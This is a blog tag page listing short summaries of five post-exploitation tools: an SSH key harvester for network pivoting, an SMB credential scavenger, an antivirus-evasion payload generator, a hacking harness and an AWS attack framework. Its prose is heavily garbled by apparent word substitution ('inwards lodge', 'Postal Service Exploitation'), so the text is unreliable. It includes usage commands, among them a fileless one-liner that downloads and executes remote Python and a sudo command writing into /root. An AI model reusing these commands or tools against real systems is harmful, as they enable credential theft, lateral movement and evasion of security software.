Posts

Showing posts with the label Post-Exploitation

Punk.Py - Unix Ssh Post-Exploitation Tool

Image
unix SSH post-exploitation 1337 tool how it works punk.py is a post-exploitation tool meant to assistance network pivoting from a compromised unix box. It collect usernames, ssh keys in addition to known hosts from a unix system, in addition to hence it tries to connect via ssh to all the combinations found. punk.py is wrote inwards lodge to function on criterion python2 in addition to python3 installations. examples criterion execution: $ ./punk.py skip passwd checks in addition to role a custom abode path: $ ./punk.py --no-passwd --home /home/ldapusers/ execute commands alongside sudo: $ ./punk.py --run "sudo sh -c 'echo iamROOT>/root/hacked.txt'" one-liner fileless ( alongside --no-passwd parameter ): $ python -c "import urllib2;exec(urllib2.urlopen('https://raw.githubusercontent.com/r3vn/punk.py/master/punk.py').read())" --no-passwd TODO improve mortal keys hunting including dsa keys Recursion SSH keys alongsid...

Scavenger - Is A Multi-Threaded Post-Exploitation Scanning Tool For Scavenging Systems, Finding Almost Ofttimes Used Files As Well As Folders Equally Good Equally Interesting Files Containing Sensitive Information

Image
scavenger : is a multi-threaded post-exploitation scanning tool for scavenging systems, finding close ofttimes used files as well as folders every bit good every bit "interesting" files containing sensitive information. Problem Definition: Scavenger confronts a challenging lawsuit typically faced yesteryear Penetration Testing consultants during internal penetration tests; the lawsuit of having besides much access to besides many systems alongside express days for testing. Requirements: Install CrackMapExec - CrackMapExec Installation Page Examples: $ python3 ./scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local $ python3 ./scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite Blog Post: Link to Trustwave SpiderLabs Blog Acknowledgements - Powered as well as Inspired by: Impacket (@agsolino) CrackMapExec (@byt3bl33d3r) ccsrch (@adamcaudill) LaZagne Download ...

Phantom Evasion - Python Av Evasion Tool Capable To Generate Fud Executable Fifty-Fifty Amongst The Virtually Mutual 32 Fleck Metasploit Payload (Exe/Elf/Dmg/Apk)

Image
Phantom-Evasion is an interactive antivirus evasion tool written inwards python capable to generate (almost) FUD executable fifty-fifty amongst the most mutual 32 fleck msfvenom payload (lower detection ratio amongst 64 fleck payloads). The aim of this tool is to brand antivirus evasion an slowly chore for pentesters through the usage of modules focused on polymorphic code in addition to antivirus sandbox detection techniques. Since version 1.0 Phantom-Evasion also include a post-exploitation department dedicated to persistence in addition to auxiliary modules. The next OSs officialy back upward automatic setup: Kali Linux Rolling 2018.1+ (64 bit) Parrot Security (64 bit) The next OSs are probable able to run Phantom Evasion through manual setup: Arch Linux (64 bit) BlackArch Linux (64 bit) Elementary (64 bit) Linux Mint (64 bit) Ubuntu 15.10+ (64 bit) Windows 7/8/10 (64 bit) Contributors Special thank you lot to: phra https://github.com/phra stefano118 http...

Ffm (Freedom Fighting Mode) - Opened Upward Rootage Hacking Harness

Image
FFM is a hacking harness that y'all tin occupation during the post-exploitation stage of a red-teaming engagement. The see of the tool was derived from a 2007 conference from @thegrugq. It was presented at SSTIC 2018 as well as the accompanying slide deck is available at this url . If you're non familiar amongst this flat of tools, it is strongly advised to conduct maintain a seem at them to empathise what a hacking harness' role is. All the comments are included inwards the slides. Usage The goal of a hacking harness is to deed equally a helper that automates mutual tasks during the post-exploitation phase, but also safeguards the user against mistakes they may make. It is an instrumentation of the shell. Run ./ffm.py to activate it as well as y'all tin start working immediately. There are 2 commands y'all demand to know about: Type !list to display the commands provided past times the harness. Type SHIFT+TAB to perform tab completion on the loca...

Barq - The Aws Cloud Postal Service Exploitation Framework!

Image
barq: The AWS Cloud Post Exploitation framework! What is it? barq is a post-exploitation framework that allows yous to easily perform attacks on a running AWS infrastructure. It allows yous to laid upward on running EC2 instances without having the master copy instance SSH keypairs. It also allows yous to perform enumeration as well as extraction of stored Secrets as well as Parameters inwards AWS. Prerequisites An existing AWS line organisation human relationship access fundamental id as well as undercover (Token likewise inwards unopen to case) Python ii or 3. It tin sack run amongst both. To run the msfvenom payloads, yous withdraw msfvenom to live on available on your workstation, amongst the PATH setup correctly. Installing For python 2: pip install -r requirements.txt For python3 pip3 install -r requirements.txt Better to practise a virtualenv environs for the tool. Please banking concern annotation that using sudo amongst pip is non recommended. Author ...